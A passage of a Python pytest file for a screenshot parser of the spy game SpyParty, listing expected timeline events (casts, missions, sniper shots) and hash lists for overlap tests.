(None,),
TimelineCategory.ActionTriggered,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"01:21.6",
"started fingerprinting statue.",
(None,),
81.6,
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"01:20.6",
"fingerprinted statue.",
(None,),
80.6,
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionPartial,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"01:20.4",
"put back statue.",
(None,),
80.4,
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:11.1",
"marked suspicious.",
(Characters.Sari,),
71.1,
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:07.7",
"spy enters conversation.",
(None,),
67.7,
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:59.3",
"spy leaves conversation.",
(None,),
59.3,
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:56.8",
"spy enters conversation.",
(None,),
56.8,
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:43.0",
"spy leaves conversation.",
(None,),
43.0,
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"00:41.1",
"marked suspicious.",
(Characters.Alice,),
41.1,
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:35.6",
"action triggered: check watch",
(None,),
35.6,
None,
(None,),
(None,),
TimelineCategory.Watch | TimelineCategory.ActionTriggered,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:35.6",
"watch checked to add time.",
(None,),
35.6,
None,
(None,),
(None,),
TimelineCategory.Watch | TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:34.5",
"action test green: check watch",
(None,),
34.5,
None,
(None,),
(None,),
TimelineCategory.Watch
| TimelineCategory.TimeAdd
| TimelineCategory.ActionTest,
Missions.NoMission,
ActionTest.Green,
),
(
"spy",
"00:33.1",
"45 seconds added to match.",
(None,),
33.1,
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:17.6",
"marked suspicious.",
(Characters.Wheels,),
77.6,
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:12.1",
"spy enters conversation.",
(None,),
72.1,
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:12.1",
"spy joined conversation with double agent.",
(Characters.Duke,),
72.1,
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"00:58.0",
"took shot.",
(Characters.Sari,),
58.0,
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperShot,
Missions.NoMission,
ActionTest.NoAT,
),
(
"game",
"00:54.3",
"sniper shot civilian.",
(Characters.Sari,),
54.3,
None,
(Roles.Civilian,),
(None,),
TimelineCategory.GameEnd,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
(
"duke_spy",
[
(
"spy",
"04:30.0",
"spy cast.",
(Characters.Duke,),
(4 * 60 + 30.0),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"ambassador cast.",
(Characters.Rocker,),
(4 * 60 + 30.0),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"double agent cast.",
(Characters.Oprah,),
(4 * 60 + 30.0),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"suspected double agent cast.",
(Characters.General,),
(4 * 60 + 30.0),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"suspected double agent cast.",
(Characters.Disney,),
(4 * 60 + 30.0),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"seduction target cast.",
(Characters.Plain,),
(4 * 60 + 30.0),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Helen,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Queen,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Alice,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Sari,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Bling,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Carlos,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Teal,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Wheels,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Salmon,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Boots,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Sikh,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Morgan,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Irish,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Smallman,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Taft,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"bug ambassador selected.",
(None,),
(4 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"contact double agent selected.",
(None,),
(4 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"transfer microfilm selected.",
(None,),
(4 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Transfer,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"swap statue selected.",
(None,),
(4 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"inspect 3 statues selected.",
(None,),
(4 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"seduce target selected.",
(None,),
(4 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"purloin guest list selected.",
(None,),
(4 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"fingerprint ambassador selected.",
(None,),
(4 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"bug ambassador enabled.",
(None,),
(4 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Bug,
ActionTest.NoAT,
),
],
),
(
"short_game",
[
(
"spy",
"02:00.0",
"spy cast.",
(Characters.Smallman,),
(2 * 60 + 00.0),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:00.0",
"ambassador cast.",
(Characters.Taft,),
(2 * 60 + 00.0),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:00.0",
"double agent cast.",
(Characters.Irish,),
(2 * 60 + 00.0),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:00.0",
"seduction target cast.",
(Characters.Morgan,),
(2 * 60 + 00.0),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:00.0",
"civilian cast.",
(Characters.Plain,),
(2 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:00.0",
"civilian cast.",
(Characters.Sikh,),
(2 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:00.0",
"civilian cast.",
(Characters.Bling,),
(2 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:00.0",
"bug ambassador selected.",
(None,),
(2 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"02:00.0",
"contact double agent selected.",
(None,),
(2 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"02:00.0",
"seduce target selected.",
(None,),
(2 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"02:00.0",
"bug ambassador enabled.",
(None,),
(2 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"02:00.0",
"contact double agent enabled.",
(None,),
(2 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"02:00.0",
"seduce target enabled.",
(None,),
(2 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Seduce,
ActionTest.NoAT,
),
(
"game",
"02:00.0",
"game started.",
(None,),
(2 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.GameStart,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:58.8",
"spy player takes control from ai.",
(None,),
(1 * 60 + 58.8),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:58.7",
"marked suspicious.",
(Characters.Taft,),
(1 * 60 + 58.7),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:58.7",
"spy leaves conversation.",
(None,),
(1 * 60 + 58.7),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:56.3",
"marked spy suspicious.",
(Characters.Smallman,),
(1 * 60 + 56.3),
None,
(Roles.Spy,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:56.1",
"spy enters conversation.",
(None,),
(1 * 60 + 56.1),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:56.1",
"spy joined conversation with double agent.",
(Characters.Irish,),
(1 * 60 + 56.1),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:49.7",
"action triggered: contact double agent",
(None,),
(1 * 60 + 49.7),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"01:49.7",
"real banana bread started.",
(None,),
(1 * 60 + 49.7),
None,
(None,),
(None,),
TimelineCategory.BananaBread,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"01:48.8",
"action test green: contact double agent",
(None,),
(1 * 60 + 48.8),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Contact,
ActionTest.Green,
),
(
"spy",
"01:48.8",
"banana bread uttered.",
(None,),
(1 * 60 + 48.8),
None,
(None,),
(None,),
TimelineCategory.BananaBread,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"01:48.3",
"double agent contacted.",
(Characters.Irish,),
(1 * 60 + 48.3),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.MissionComplete,
Missions.Contact,
ActionTest.NoAT,
),
(
"sniper",
"01:44.1",
"took shot.",
(Characters.Smallman,),
(1 * 60 + 44.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.SniperShot,
Missions.NoMission,
ActionTest.NoAT,
),
(
"game",
"01:40.9",
"sniper shot spy.",
(Characters.Smallman,),
(1 * 60 + 40.9),
None,
(Roles.Spy,),
(None,),
TimelineCategory.GameEnd,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
(
"clock_remaining",
[
(
"spy",
"01:51.5",
"begin planting bug while standing.",
(Characters.Wheels,),
(1 * 60 + 51.5),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.NoCategory,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"01:49.8",
"bugged ambassador while standing.",
(Characters.Wheels,),
(1 * 60 + 49.8),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.MissionComplete,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"01:48.9",
"action triggered: seduce target",
(None,),
(1 * 60 + 48.9),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:48.9",
"begin flirtation with seduction target.",
(Characters.Oprah,),
(1 * 60 + 48.9),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:48.2",
"action test white: seduce target",
(None,),
(1 * 60 + 48.2),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Seduce,
ActionTest.White,
),
(
"spy",
"01:48.2",
"flirt with seduction target: 59%",
(Characters.Oprah,),
(1 * 60 + 48.2),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:35.8",
"spy leaves conversation.",
(None,),
95.8,
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:35.8",
"spy left conversation with double agent.",
(Characters.Salmon,),
95.8,
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:30.6",
"spy enters conversation.",
(None,),
90.6,
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:29.0",
"flirtation cooldown expired.",
(None,),
89.0,
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:03.3",
"spy leaves conversation.",
(None,),
63.3,
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:57.6",
"spy enters conversation.",
(None,),
57.6,
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:57.0",
"action triggered: seduce target",
(None,),
57.0,
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"00:57.0",
"begin flirtation with seduction target.",
(Characters.Oprah,),
57.0,
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"00:55.9",
"action test green: seduce target",
(None,),
55.9,
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Seduce,
ActionTest.Green,
),
(
"spy",
"00:55.9",
"flirt with seduction target: 100%",
(Characters.Oprah,),
55.9,
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"00:55.9",
"target seduced.",
(Characters.Oprah,),
55.9,
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionComplete,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"00:43.9",
"spy leaves conversation.",
(None,),
43.9,
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:39.3",
"picked up statue.",
(None,),
39.3,
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:36.1",
"action triggered: swap statue",
(None,),
36.1,
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTriggered,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"00:35.5",
"action test green: swap statue",
(None,),
35.5,
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTest,
Missions.Swap,
ActionTest.Green,
),
(
"spy",
"00:35.5",
"statue swap pending.",
(None,),
35.5,
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.Swap,
ActionTest.NoAT,
),
(
"game",
"00:35.5",
"missions completed. countdown pending.",
(None,),
35.5,
None,
(None,),
(None,),
TimelineCategory.MissionCountdown,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:34.5",
"put back statue.",
(None,),
34.5,
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:21.7",
"action triggered: check watch",
(None,),
21.7,
None,
(None,),
(None,),
TimelineCategory.Watch | TimelineCategory.ActionTriggered,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:21.7",
"watch checked.",
(Characters.Smallman,),
21.7,
None,
(Roles.Spy,),
(None,),
TimelineCategory.Watch,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:16.3",
"character picked up pending statue.",
(Characters.Bling,),
16.3,
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Statues,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"00:13.9",
"statue swapped.",
(Characters.Bling,),
13.9,
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionComplete,
Missions.Swap,
ActionTest.NoAT,
),
(
"game",
"00:13.9",
"missions completed. 10 second countdown.",
(None,),
13.9,
None,
(None,),
(None,),
TimelineCategory.MissionCountdown,
Missions.NoMission,
ActionTest.NoAT,
),
(
"game",
"00:03.9",
"missions completed successfully.",
(None,),
3.9,
None,
(None,),
(None,),
TimelineCategory.GameEnd,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
(
"clock_elapsed",
[
(
"spy",
"128.50",
"begin planting bug while standing.",
(Characters.Wheels,),
None,
128.50,
(Roles.Ambassador,),
(None,),
TimelineCategory.NoCategory,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"130.13",
"bugged ambassador while standing.",
(Characters.Wheels,),
None,
130.13,
(Roles.Ambassador,),
(None,),
TimelineCategory.MissionComplete,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"131.06",
"action triggered: seduce target",
(None,),
None,
131.06,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"131.06",
"begin flirtation with seduction target.",
(Characters.Oprah,),
None,
131.06,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"131.75",
"action test white: seduce target",
(None,),
None,
131.75,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Seduce,
ActionTest.White,
),
(
"spy",
"131.75",
"flirt with seduction target: 59%",
(Characters.Oprah,),
None,
131.75,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"144.19",
"spy leaves conversation.",
(None,),
None,
144.19,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"144.19",
"spy left conversation with double agent.",
(Characters.Salmon,),
None,
144.19,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"149.31",
"spy enters conversation.",
(None,),
None,
149.31,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"150.94",
"flirtation cooldown expired.",
(None,),
None,
150.94,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"176.63",
"spy leaves conversation.",
(None,),
None,
176.63,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"182.38",
"spy enters conversation.",
(None,),
None,
182.38,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"183.00",
"action triggered: seduce target",
(None,),
None,
183.0,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"183.00",
"begin flirtation with seduction target.",
(Characters.Oprah,),
None,
183.0,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"184.06",
"action test green: seduce target",
(None,),
None,
184.06,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Seduce,
ActionTest.Green,
),
(
"spy",
"184.06",
"flirt with seduction target: 100%",
(Characters.Oprah,),
None,
184.06,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"184.06",
"target seduced.",
(Characters.Oprah,),
None,
184.06,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionComplete,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"196.06",
"spy leaves conversation.",
(None,),
None,
196.06,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"200.69",
"picked up statue.",
(None,),
None,
200.69,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"203.81",
"action triggered: swap statue",
(None,),
None,
203.81,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTriggered,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"204.50",
"action test green: swap statue",
(None,),
None,
204.50,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTest,
Missions.Swap,
ActionTest.Green,
),
(
"spy",
"204.50",
"statue swap pending.",
(None,),
None,
204.50,
(None,),
(None,),
TimelineCategory.Statues,
Missions.Swap,
ActionTest.NoAT,
),
(
"game",
"204.50",
"missions completed. countdown pending.",
(None,),
None,
204.50,
(None,),
(None,),
TimelineCategory.MissionCountdown,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"205.50",
"put back statue.",
(None,),
None,
205.50,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"218.25",
"action triggered: check watch",
(None,),
None,
218.25,
(None,),
(None,),
TimelineCategory.Watch | TimelineCategory.ActionTriggered,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"218.25",
"watch checked.",
(Characters.Smallman,),
None,
218.25,
(Roles.Spy,),
(None,),
TimelineCategory.Watch,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"223.63",
"character picked up pending statue.",
(Characters.Bling,),
None,
223.63,
(Roles.Civilian,),
(None,),
TimelineCategory.Statues,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"226.06",
"statue swapped.",
(Characters.Bling,),
None,
226.06,
(Roles.Civilian,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionComplete,
Missions.Swap,
ActionTest.NoAT,
),
(
"game",
"226.06",
"missions completed. 10 second countdown.",
(None,),
None,
226.06,
(None,),
(None,),
TimelineCategory.MissionCountdown,
Missions.NoMission,
ActionTest.NoAT,
),
(
"game",
"236.06",
"missions completed successfully.",
(None,),
None,
236.06,
(None,),
(None,),
TimelineCategory.GameEnd,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
]
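# Each expected tuple mirrors the unpacking in test_parse_timeline below:
# (actor, raw time string, event text, cast names, time in seconds,
#  elapsed time in seconds, roles, books, timeline category, mission, action test).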
@pytest.mark.parsing
@pytest.mark.parametrize("image_name, expecteds", SCREENSHOT_TEST_CASES)
def test_parse_timeline(
image_name: str,
expecteds: List[
Tuple[
str,
str,
str,
Tuple[Characters],
Optional[float],
Optional[float],
Tuple[Roles],
Tuple[Books],
TimelineCategory,
Missions,
ActionTest,
]
],
base_temp_dir,
):
screenshot_img = cv2.imread(
str(base_temp_dir.joinpath("test_screenshots", f"{image_name}.png").resolve())
)
timeline_events = parse_screenshot(screenshot_img)
assert len(timeline_events) == len(expecteds)
for event, exp in zip(timeline_events, expecteds):
(
e_actor,
e_raw_time_str,
e_event,
e_cast_name,
e_time_in_sec,
e_elapsed_time_in_sec,
e_role,
e_books,
e_category,
e_mission,
e_action_test,
) = exp
assert event.actor == e_actor
assert event._raw_time_str == e_raw_time_str
assert event.event == e_event
assert event.cast_name == e_cast_name
assert event.time == e_time_in_sec
assert event.elapsed_time == e_elapsed_time_in_sec
assert event.role == e_role
assert event.books == e_books
assert event.category == e_category
assert event.mission == e_mission
assert event.action_test == e_action_test
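# Each case pairs a flat list of per-event hashes with the expected number of
# events on the last parsed page that duplicate events already seen; e.g.
# list(range(30)) + list(range(16, 46)) repeats hashes 16-29, so 14 overlap.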
OVERLAP_HASH_TEST_CASES = [
([], 0),
# test case taken from
(
[
4898569955834637889,
-4414489284896555474,
-5683575663596673397,
-6727287813583471907,
6091366772103832389,
8372541563657396237,
-5998200551159387251,
-8350152916269273221,
8054318264316763706,
-7773028656705170379,
4857987452609043078,
2426212828938566709,
-9195684035214585113,
6262737924542373709,
-4462780260128884117,
4966964054850516428,
6310410009357200445,
-743246492690333081,
-7047028544218896895,
-5621347802322359969,
-6448705873843666124,
8297621253914253337,
1026440669783540158,
1473315671454268467,
-4555721104568928804,
7319079772568642287,
-6272454861391088382,
1202541922402720900,
-4791185849326570354,
-8648060616625656676,
6192524553168898821,
1095959189604413276,
-2487854583837734527,
6214444077178414495,
-6743699474363429090,
-7907129591594689933,
-3200233558801643978,
5548470840566651052,
-515246112565934050,
5552309446946592289,
3276521516792218876,
-6993507546958920025,
4237899588761139910,
8614420660470844145,
-3637992246739640041,
-3317205397768809852,
-6984375733142720586,
684784715920252680,
6464085402063056967,
-110423439490813070,
-9206787334010066531,
-8965393725341744810,
4795204757292903171,
-4853211488406126821,
-2809935517467852731,
-7701016839766834705,
-1956520985913015316,
-8856221326385893001,
-2606966940955522812,
-1595404463426174141,
1029605680750905825,
8482082510959136174,
-3384240464622680325,
-7013454046217635141,
2230081605807153069,
-1390917854947158567,
8341402324383349642,
3192202567968357689,
-436262288112376921,
-4565100090044904977,
-1731295948189016240,
3192202567968357689,
-436262288112376921,
-1032990216138025315,
2693125543119600033,
7368559427308120107,
5974161061667067404,
3270713386344843245,
-6153343156143776805,
